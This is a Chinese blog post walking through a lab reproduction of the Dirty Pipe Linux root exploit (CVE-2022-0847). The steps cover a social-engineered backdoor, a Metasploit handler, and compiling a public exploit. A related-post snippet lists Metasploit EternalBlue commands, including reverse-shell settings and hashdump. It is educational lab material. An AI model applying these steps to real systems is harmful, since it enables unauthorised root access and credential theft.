CVE-2022-0847漏洞攻击案例(虚拟机测试)

已于 2023-08-30 20:10:52 修改
阅读量303 收藏 2
点赞数 1
文章标签: 网络 安全
于 2023-08-30 20:07:42 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_50281314/article/details/132589329
版权

CVE-2022-0847漏洞攻击案例

!!!下面复现需要在虚拟机中完成(以下文章仅供学习参考):   

        攻击工具及环境说明

(1)操作系统选择:

Ubuntu Kylin(20.04):作为受攻击目标。

Kali Linux(2021):作为攻击者的攻击平台。

(1)安装依赖:

在Kali Linux上,下载漏洞CVE-2022-0847利用脚本文件和必要的开发文件(gcc、make等)。

(2)漏洞利用工具:

在https://github.com/AlexisAhmed/CVE-2022-0847-DirtyPipe-Exploits.git下载CVE-2021-4034漏洞的工具箱

(3)网络连接:

确保Ubuntu Kylin和Kali Linux之间可以进行网络通信,以便在攻击环境中执行必要的操作

攻击过程

(1)在Kali Linux上下载漏洞利用脚本工具。

(2)使用gcc和make等工具构建和编译代码。

(3)在Ubuntu Kylin上启用后门脚本文件

(4)触发监听

(5)上传漏洞脚本并进行编译

(6)进行特权操作:攻击者已经获得了以管理员特权执行的权限,可以执行恶意操作或获取敏感信息。

漏洞利用及渗透总结

1、修改/覆盖只读文件提权

exploit-1.c 漏洞可用于修改或覆盖任意只读文件。漏洞利用代码已配置为用“管道”密码替换 root 密码,并将备份 /tmp/passwd.bak 下的/etc/passwd 文件。该漏洞利用还将为您提供提升的 root shell,并在完成后恢复原始 passwd 文件

(1)使用kali生成后门

(2)社会工程学上传后门脚本到靶机ubuntu kylin

(3)用过kali的msf选择对应的模块:use exploit/multi/handle

(4)设置参数

(5)运行

(6)kali上传CVE-2022-0847漏洞利用脚本

(7)执行shell,ls查看靶机目录下文件,编译脚本

(8)查看编译前的用户信息为普通用户,执行编译后的脚本,获得root权限

2、劫持 SUID 二进制文件提权

以 root 身份运行的只读 SUID 进程内存中注入和覆盖数据。查找SUID二进制文件

(1)上传脚本利用漏洞

(2)ls查看上传的脚本

(3)编译脚本,执行编译后的脚本,获得root权限

金铃桃夭
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
WebLogic反序列化漏洞复现+利用工具(CVE-2021-2394)
0xSec
04-08 4117
Oracle官方发布了2021年7月份安全更新通告,通告中披露了WebLogic组件存在高危漏洞攻击者可以在未授权的情况下通过IIOP、T3协议对存在漏洞的WebLogic Server组件进行攻击。成功利用该漏洞攻击者可以接管WebLogic Server。这是一个二次反序列化漏洞,是CVE-2020-14756和CVE-2020-14825的调用链相结合组成一条新的调用链来绕过weblogic黑名单列表。
Docker Dirtypipe(CVE-2022-0847漏洞复现与分析容器逃逸
SHELLCODE_8BIT的博客
08-07 764
GitHub - greenhandatsjtu/CVE-2022-0847-Container-Escape: CVE-2022-0847 used to achieve container escape 利用CVE-2022-0847 (Dirty Pipe) 实现容器逃逸
漏洞实现 --- Vm2沙箱逃逸漏洞复现(CVE-2023-32314)
weixin_62443409的博客
09-13 4788
安装低版本npm是为了规避npm的内部审核机制(高版本npm会检查vm2安装包的安全性)CentOS7(Nodejs和[email protected])升级nodejs至高版本。
VMware Tools本地提权漏洞CVE-2022-31676分析与复现(1)
C20220511的博客
09-14 1383
VMware Tools没有正确的检查客户端请求的授权,导致包含一个本地权限提升漏洞,可以使虚拟机中的计算机账号由非管理员权限提升到管理员权限。
CVE-2022-0847 Dirty Pipe linux内核提权漏洞 | POC
dust_hk的博客
03-09 5107
The Dirty Pipe Linux kernelprivilege escalation 摘要 Linux Kernel 5.8及以后版本中允许覆盖重写任意可读文件中的数据,未经授权的本地用户可以使用此漏洞写入由只读文件支持的页面缓存中的页面,可以利用此漏洞进行本地权限提升。类似于CVE-2016-5195 “Dirty Cow”。此漏洞影响 5.17-rc6 之前的 Linux 内核版本。 评分 CVSSV3 :7.8 POC已公开 影响范围 影响版本 5.8 <=.
CVE-2022-33891POC Apache Spark 命令注入(CVE-2022-33891)POC
08-10
CVE-2022-33891POC Apache Spark 命令注入(CVE-2022-33891)POC CVE-2022-33891 影响版本 Apache spark version 3.1.1版本 Apache Spark version>= 3.3.0 修复方案 1.建议升级到安全版本,参考官网链接: ...
麒麟Linux kernel本地权限提升漏洞(CVE-2022-0847)漏洞补丁及相关依赖包3
最新发布
03-15
麒麟Linux kernel本地权限提升漏洞(CVE-2022-0847)漏洞补丁及相关依赖包3麒麟Linux kernel本地权限提升漏洞(CVE-2022-0847)漏洞补丁及相关依赖包3麒麟Linux kernel本地权限提升漏洞(CVE-2022-0847)漏洞补丁及相关...
新版脏牛Linux内核提权漏洞CVE-2022-0847
03-09
5.8 中的一个漏洞,它允许覆盖任意只读文件中的数据。这会导致权限提升,因为非特权进程可以将代码注入根进程。 修复版本:Linux 5.16.11、5.15.25 和 5.10.102 中修复。
XStream拒绝服务漏洞(CVE-2022-41966)响应通告
05-05
XStream拒绝服务漏洞(CVE-2022-41966)响应通告
网络安全---漏洞复现】Tomcat CVE-2020-1938 漏洞复现和利用过程(特详细)
m0_67844671的博客
09-12 9000
Tomcat CVE-2020-1938 漏洞复现和利用过程(特详细);Apache Tomcat文件包含漏洞(CNVD-2020-10487/CVE-2020-1938)。该漏洞是由于Tomcat AJP协议存在缺陷而导致,攻击者利用该漏洞可通过构造特定参数,读取服务器webapp下的任意文件。若目标服务器同时存在文件上传功能,攻击者可进一步实现远程代码执行。AJP(Apache JServ Protocol)是定向包协议。因为性能原因,使用二进制格式来传输可读性文本。WEB服务器通过 TCP连接
CVE-2022-0847 DirtyPipe 提权漏洞 复现
god_Zeo的安全博客
03-08 4682
0x00 介绍 DirtyPipe (CVE-2022-0847) 是自 5.8 以来 Linux 内核中的一个漏洞,它允许覆盖任意只读文件中的数据。 其要求内核是5.8以上的才能利用 相关链接: 原文地址:https://dirtypipe.cm4all.com/ 准备 创建一个低权限用户 我的环境是docker里面 uname -a Linux ae801d08733b 5.10.76-linuxkit #1 SMP Mon Nov 8 10:21:19 UTC 2021 x86_64 x86_64
[旧文系列] CVE-2020-5902: F5 BIG-IP RCE 漏洞复现与分析
mole_exp的博客
01-05 3702
文章目录关于<旧文迁移>1、前言2、搭建漏洞环境3、漏洞复现3.1 任意文件读取3.2 列出目录项3.3 RCE4、搭建漏洞调试环境5、漏洞分析5.1 坑5.2 漏洞原理Apache与Tomcat对分号 ; 的解析差异5.3 小结参考 关于<旧文迁移> <旧文迁移>系列是笔者将以前发到其他地方的技术文章,挑选其中一些值得保留的,迁移到当前博客来。 文章首发地址:hxxps://medium.com/@m01e/cve-2020-5902-f5-big-ip-rce-漏洞
漏洞复现】CVE-2020-0796永恒之黑漏洞复现
weixin_67698311的博客
06-18 2047
Windows 10 和Windows Server 2016引入了SMB 3.1.1.本次漏洞源于SMBv3没有正确处理压缩的数据包,在解压数据包的时候使用客户端传过来的长度进行解压时,并没有检查长度是否合法,最终导致整数溢出。3.使用工具检查靶机是否存在漏洞,检查工具下载地址https://github.com/ollypwn/SMBGhost运行结果如下图,证明靶机存在漏洞,Vulnerable代表目标存在漏洞,可以进行攻击!4.通过IP安全策略屏蔽危险端口,bat执行添加防火墙策略,关闭危险服务。
vluhub漏洞复现笔记:CVE-2022-22965:Spring Framework
weixin_46497491的博客
02-09 486
vluhub漏洞复现笔记:CVE-2022-22965:Spring Framework
CVE10大漏洞总结【网络安全
heikeyouyou的博客
05-19 2842
网络安全cve十大漏洞总结
Linux-dirty pipe内核提权漏洞复现-编号:CVE-2022-0847
╲ゞ紅桃K
08-31 1259
漏洞属于Linux提权漏洞, 攻击者可利用该漏洞使任何非特权(本地)用户在易受攻击的主机上获得root权限,非特权进程可以将代码注入到根进程使得攻击者可获取服务器的所有权限。与该漏洞CVE-2022-0847(Dirty Pipe)类似的另一个漏洞CVE-2016-5195 “Dirty Cow”(脏牛提权),很多人应该了解并且能利用该漏洞。...
CVE-2022-0847 Linux内核提权漏洞分析
道阻且长,行则将至。
04-06 5213
文章目录前言漏洞复现1.1 文件覆写poc/exp1.2 覆写/etc/passwd漏洞分析2.1 Linux管道机制2.2 splice系统调用2.3 漏洞利用流程总结 前言 2022年2月23日,Linux 内核发布漏洞补丁,修复了内核 5.8 及之后版本存在的任意文件覆盖的漏洞 (CVE-2022-0847),该漏洞可导致普通用户本地提权至 root 特权,因为与之前出现的 DirtyCow “脏牛”漏洞 (CVE-2016-5195) 原理类似,该漏洞被命名为 DirtyPipe。 在3月7日,漏洞
OpenSSL 心脏滴血漏洞(CVE-2014-0160)漏洞讲解(小白可懂,简单详细)
热门推荐
qq_62803993的博客
01-26 1万+
OpenSSL“心脏出血”漏洞的问题出现在openSSL处理TLS心跳的过程中,TLS心跳的流程是:A向B发送请求包,B收到包后读取这个包的内容(data),并返回一个包含有请求包内容的响应包。请求包的内容(data)中包含有包的类型(type)和数据长度等信息。
使用kali虚拟机攻击靶机windows7的永恒之蓝漏洞攻击代码
05-03
首先,需要确保你已经安装了Metasploit框架,因为它包含了永恒之蓝漏洞的利用模块。然后,按照以下步骤进行操作: 1. 打开Kali Linux虚拟机并启动Metasploit框架。 2. 执行以下命令,下载永恒之蓝漏洞利用模块: ``` use exploit/windows/smb/ms17_010_eternalblue ``` 3. 设置目标主机的IP地址: ``` set RHOST <target_ip_address> ``` 4. 设置攻击机的IP地址: ``` set LHOST <attacker_ip_address> ``` 5. 指定目标主机的操作系统: ``` set TARGET <target_os> ``` 6. 运行漏洞利用模块: ``` exploit ``` 7. 如果攻击成功,你将获得一个Meterpreter Shell。你可以使用以下命令来执行各种操作,例如查看文件、上传文件、截获密码、远程控制目标系统等: ``` sysinfo getuid background upload download hashdump meterpreter> shell ``` 需要注意的是,使用永恒之蓝漏洞进行攻击是非常危险的,因为这可能会导致被攻击系统受到严重的损害。在进行任何攻击之前,请确保你已经获得了所有必要的授权和许可。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

金铃桃夭

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值